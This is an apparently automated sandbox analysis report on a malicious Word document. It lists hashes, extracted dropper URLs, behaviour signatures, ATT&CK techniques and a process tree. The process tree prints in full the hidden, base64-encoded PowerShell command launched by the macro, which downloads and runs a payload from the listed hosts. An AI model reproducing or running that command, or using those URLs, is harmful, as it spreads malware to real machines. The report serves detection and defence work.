Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:28

General

  • Target

    65b0b31f684e3523eed09883d33b6dcf_JaffaCakes118.doc

  • Size

    119KB

  • MD5

    65b0b31f684e3523eed09883d33b6dcf

  • SHA1

    3d7d2fcd99d4d6ff76f0fa7a0204e40f2aaac2e3

  • SHA256

    c504761129ce0cf9a531ba30c6e8fbc9a9e8b9e7cf10a28a12dc6f62286902a4

  • SHA512

    72c7239ef19838f24eca4e747d1f045aeb8d299332ec045d3f912afa5003d8499b1f4cea6dae805f9c22571c6b75c57746081a7c564a16930a89a73ab7843b7b

  • SSDEEP

    1536:m6U079PaNYs+agHZRCvT6bUuZNNuykJZ1Ops3gu/:9vZy6bUuZTuykVOpsQ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://timetopatent.com/djjgFG1/

exe.dropper

http://thebluefront.com/u5kTmV/

exe.dropper

http://transitraum.de/NXkK7n/

exe.dropper

http://myorganicflowers.com/sJXE/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\65b0b31f684e3523eed09883d33b6dcf_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2884
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHeLL.exe
        PowersHeLL -WinDowsTyle hidden -e IAAuACAAKAAoAEcAdgAgACcAKgBNAEQAUgAqACcAKQAuAE4AQQBNAEUAWwAzACwAMQAxACwAMgBdAC0AagBvAEkAbgAnACcAKQAgACgAKAAoACIAewAxADgAfQB7ADkANwB9AHsAMQAxAH0AewAxADUAMQB9AHsAMgA3AH0AewAxADEANwB9AHsAMwA2AH0AewA3ADYAfQB7ADEAMAA3AH0AewA2ADMAfQB7ADEANAAwAH0AewA1ADQAfQB7ADcAMAB9AHsAMQA0ADIAfQB7ADkAOAB9AHsAMQAxADgAfQB7ADIANgB9AHsANQAzAH0AewAzAH0AewAxADAANAB9AHsAMQAwADgAfQB7ADAAfQB7ADQAOAB9AHsANAAyAH0AewA1ADEAfQB7ADYAMgB9AHsAMQAxADAAfQB7ADMANQB9AHsAMgA4AH0AewAxADMAfQB7ADcAMwB9AHsAMQAwADMAfQB7ADEAMwAzAH0AewAxADMAOAB9AHsANwA4AH0AewA3ADEAfQB7ADgAOAB9AHsANQA5AH0AewAzADMAfQB7ADMAMQB9AHsAMQA5AH0AewAxADIAOQB9AHsAOQB9AHsAMQAzADcAfQB7ADYAOQB9AHsAMQB9AHsAMwA5AH0AewAxADUANAB9AHsANwA1AH0AewA2ADcAfQB7ADkANQB9AHsANgB9AHsAMQAzADQAfQB7ADMANAB9AHsAMgAwAH0AewA3ADIAfQB7ADEANAB9AHsAMQA0ADkAfQB7ADMAMgB9AHsAMQA0ADUAfQB7ADQANAB9AHsAMwAwAH0AewAxADAANgB9AHsANAAzAH0AewA2ADYAfQB7ADkAMwB9AHsAMQA2AH0AewAxADUAfQB7ADEAMQA2AH0AewA1ADAAfQB7ADYAMAB9AHsAMQA0ADgAfQB7ADIAfQB7ADUANQB9AHsANwA5AH0AewA0AH0AewAzADgAfQB7ADIANQB9AHsAMgAxAH0AewAyADMAfQB7ADEAMAB9AHsAMQAzADIAfQB7ADEANAA0AH0AewAzADcAfQB7ADQAOQB9AHsAMQA1ADcAfQB7ADIAOQB9AHsAMQAyADYAfQB7ADYANAB9AHsAMQAwADEAfQB7ADUANwB9AHsAMQAyADUAfQB7ADEAMgAwAH0AewAxADUANQB9AHsAMQAyADIAfQB7ADEAMgAxAH0AewAxADEANAB9AHsAMQAyAH0AewA4ADMAfQB7ADEANQAyAH0AewA4ADUAfQB7ADYANQB9AHsAOAA3AH0AewA4ADkAfQB7ADEANwB9AHsAOAAxAH0AewAxADUAMwB9AHsAOQAxAH0AewA2ADgAfQB7ADgAMAB9AHsANAAxAH0AewAxADEAMwB9AHsAMQAxADIAfQB7ADEAMQAxAH0AewA4ADQAfQB7ADUAOAB9AHsAMgA0AH0AewA4ADYAfQB7ADEAMwAwAH0AewA5ADIAfQB7ADEAMwA5AH0AewA0ADYAfQB7ADkANgB9AHsAMQAzADUAfQB7ADcAfQB7ADEANQAwAH0AewAxADAAOQB9AHsAMQA0ADEAfQB7ADEAMAAwAH0AewAxADQANwB9AHsAMQA0ADYAfQB7ADEAMAAyAH0AewA5ADQAfQB7ADEAMQA1AH0AewA5ADkAfQB7ADcANwB9AHsAMQAyADcAfQB7ADQANQB9AHsAMQAyADgAfQB7ADEANQA2AH0AewAxADMANgB9AHsAMgAyAH0AewAxADMAMQB9AHsAMQAyADMAfQB7ADQANwB9AHsANwA0AH0AewA1ADIAfQB7ADQAMAB9AHsAMQAxADkAfQB7ADkAMAB9AHsAOAB9AHsANQA2AH0AewAxADAANQB9AHsANQB9AHsANgAxAH0AewA4ADIAfQB7ADEAMgA0AH0AewAxADQAMwB9ACIALQBmACAAJwAgAC4AKAAnACwAJwAxADMAMwApADsAZQBzAGcAQQBEAEMAWAAgACcALAAnAG0ALwB1ACcALAAnAFkAJwAsACcAaAB0AHQAcAA6ACcALAAnAHQAZQBtAG8AJwAsACcAbQBuAHkALgBjACcALAAnAHMAZgBjACAAaQBuACAAJwAsACcAZgAnACwAJwB0ACgAMQAwACcALAAnAHUAbQAuAGQAZQAnACwAJwAgACcALAAnADkAJwAsACcAKQAgAFMAJwAsACcAdAAnACwAJwBoAGUAYgBsACcALAAnADoALwAvAHQAJwAsACcAPQAnACwAJwBlAHMAZwBuAHMAJwAsACcAYQAnACwAJwB6AHMAWQAnACwAJwBuAHMAaQB0AHIAJwAsACcAbwBTAHQAcgBWAGMAZABpAFYAJwAsACcAYQAnACwAJwA5AGYAJwAsACcALwB0AHIAYQAnACwAJwBzACcALAAnACAAJgAoAG8AOQAnACwAJwBvADkAZgAtAG8AYgBqAGUAYwB0AG8AOQBmACcALAAnAG0AJwAsACcALgBjAG8AJwAsACcAcwBnAG4AcwAnACwAJwBhAHQAJwAsACcAOwBlAHMAZwBOAFMAQgAgAD0AIABlACcALAAnAG0ALwAnACwAJwArACcALAAnADkAZgAnACwAJwBLADcAbgAvACcALAAnAC8AJwAsACcAPQAgACcALAAnACkAOwAmACcALAAnAGMAIAArACcALAAnAGYAbgBlACcALAAnADEAJwAsACcAbgB0ACcALAAnAGUAcwBnACcALAAnAGEAYwAnACwAJwAsACAAZQBzAGcAJwAsACcAbwA5ACcALAAnAEAAJwAsACcAZQBmAHIAbwBuAHQALgAnACwAJwBvADkAZgArAG8AOQAnACwAJwBEAEMAJwAsACcAZwAnACwAJwBmAHcAJwAsACcANQBrAFQAJwAsACcAZQAnACwAJwBvACcALAAnAEIAIAArACAAKABvACcALAAnAHQAJwAsACcAYwAnACwAJwA5AGYAKQAoAGUAcwBnAFMARABDACkAOwBiAHIAZQBhAGsAOwAnACwAJwBmAHcAbwA5ACcALAAnAG8AJwAsACcAZgAnACwAJwBAAG8AJwAsACcALwBAAGgAdAB0ACcALAAnAHQAcAA6AC8ALwBzAHQAJwAsACcAdgA6AHAAJwAsACcAMgAnACwAJwAtAG8AYgBqACcALAAnAGkAJwAsACcAWQBkAC8AQABoACcALAAnAHkAcwB0ACcALAAnAFMAJwAsACcAaAB0ACcALAAnACsAbwAnACwAJwBGAEkAVgBjAGQAJwAsACcAQwBsACcALAAnAG0AVgAvAEAAJwAsACcAdQBiAGwAaQAnACwAJwAgAGUAJwAsACcAfQBjAGEAdABjACcALAAnAGYALgBTAHAAbABpAHQAKAAnACwAJwBvADkAZgAgACsAIABlAHMAZwBOAFMAJwAsACcAOQBmACcALAAnAC4AZQB4AG8AOQBmACsAbwAnACwAJwA5AGYAKQA7AGUAcwBnAFMARAAnACwAJwBlAG4AJwAsACcAQwAgACcALAAnAG8AOQBmACsAbwA5AGYAawBvADkAZgArAG8AOQAnACwAJwBlAG4AJwAsACcAKQA7AGYAJwAsACcAcAAnACwAJwBvAFYAYwBkAFcAbgBsAFYAYwBkACcALAAnAG8AcgAnACwAJwBoACgAZQAnACwAJwBhAGQAYQBzAGQAJwAsACcAdABvADkAZgApACcALAAnAGEAZAAnACwAJwAuACcALAAnAGwAJwAsACcARAAnACwAJwBlAG0AJwAsACcAWQBVACAAJwAsACcALQBJACcALAAnAG0ALwBkAGoAagBnAEYARwAnACwAJwA5AGYAZQAnACwAJwA9ACcALAAnAEEARABDAFgAKQAnACwAJwBmACcALAAnAGYAUwBwAHgAJwAsACcAbwA5ACcALAAnACAAJwAsACcAWABFAC8AbwAnACwAJwBPACcALAAnAHUAJwAsACcAZgBuAG8AJwAsACcAIAByAGEAbgBkAG8AbQA7AGUAJwAsACcAKABvADkAZgBJAG4AdgBvACcALAAnAHIAJwAsACcALwBzAEoAJwAsACcALgBjAG8AbQAnACwAJwBZAHkAKAApACcALAAnAGgAewB9ACcALAAnAHcAZQAnACwAJwB5AG8AcgBnAGEAbgBpAGMAJwAsACcAbABlAHcAWQB5ACgAJwAsACcAYQBzACcALAAnAGQAYQBzAGQALgBuAGUAeAAnACwAJwA5AGYAZQBvADkAZgAnACwAJwBjAGQATgBnAHcAJwAsACcALwAnACwAJwAuACcALAAnAG8AJwAsACcAcwBnAGEAJwAsACcAVAAnACwAJwAwADAAMAAsACAAMgA4ACcALAAnAE4AZQB0AC4AVwBlAGIAJwAsACcAbwByAGUAJwAsACcAOQBmACsAbwA5ACcALAAnAHsAdAByAHkAewBlAHMAZwBZAFkAVQAnACwAJwBlAGMAbwA5AGYAKwBvADkAZgAnACwAJwB9ACcALAAnAE4AWABrACcALAAnAGUAJwAsACcAWQB5ACcALAAnAHcAJwAsACcAbwAnACwAJwB0AHAAOgAvAC8AdABpAG0AZQB0AG8AcAAnACwAJwBlAHMAZwAnACwAJwA9ACcALAAnAG8AJwAsACcAcwBnACcALAAnAG8AOQBmAA0ACgAnACwAJwBzACcALAAnAGYAYwAuAHcAWQB5ACcALAAnAGgAdAB0AHAAOgAvAC8AJwApACkALgByAEUAcABMAEEAYwBlACgAJwBTAHAAeAAnACwAWwBzAHQAUgBJAE4ARwBdAFsAYwBoAEEAUgBdADkAMgApAC4AcgBFAHAATABBAGMAZQAoACcAVgBjAGQAJwAsACcAYAAnACkALgByAEUAcABMAEEAYwBlACgAKABbAGMAaABBAFIAXQAxADAAMQArAFsAYwBoAEEAUgBdADEAMQA1ACsAWwBjAGgAQQBSAF0AMQAwADMAKQAsACcAJAAnACkALgByAEUAcABMAEEAYwBlACgAKABbAGMAaABBAFIAXQAxADEAOQArAFsAYwBoAEEAUgBdADgAOQArAFsAYwBoAEEAUgBdADEAMgAxACkALABbAHMAdABSAEkATgBHAF0AWwBjAGgAQQBSAF0AMwA0ACkALgByAEUAcABMAEEAYwBlACgAJwBvADkAZgAnACwAWwBzAHQAUgBJAE4ARwBdAFsAYwBoAEEAUgBdADMAOQApACkAIAA=
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3056

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      ec71e23b9e31a4c49f3622a3ab4133eb

      SHA1

      d6a1c6cf08da6176281934e2f4a6e00eaf9ed507

      SHA256

      20af2c6515e3a63bf4a375986442beea79edea6b2a7d1ba8bbf3e5e3f968f315

      SHA512

      0a62be4026169399236a91bc278be7654056d26ccbbffcd5b624b3ce9de76abffdc6e35223d1672594c1a6b1706fc51d62762ed37b690348f23603711e41fe89

    • memory/3032-20-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-7-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-19-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-0-0x000000002FDD1000-0x000000002FDD2000-memory.dmp
      Filesize

      4KB

    • memory/3032-102-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-181-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-180-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-41-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-29-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-28-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-27-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-25-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-24-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-23-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-22-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-21-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-8-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-16-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-2-0x000000007102D000-0x0000000071038000-memory.dmp
      Filesize

      44KB

    • memory/3032-14-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-15-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-13-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-12-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-11-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-9-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-86-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-72-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-26-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-18-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-6-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-188-0x000000007102D000-0x0000000071038000-memory.dmp
      Filesize

      44KB

    • memory/3032-189-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-190-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/3032-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/3032-206-0x000000007102D000-0x0000000071038000-memory.dmp
      Filesize

      44KB

    • memory/3032-207-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB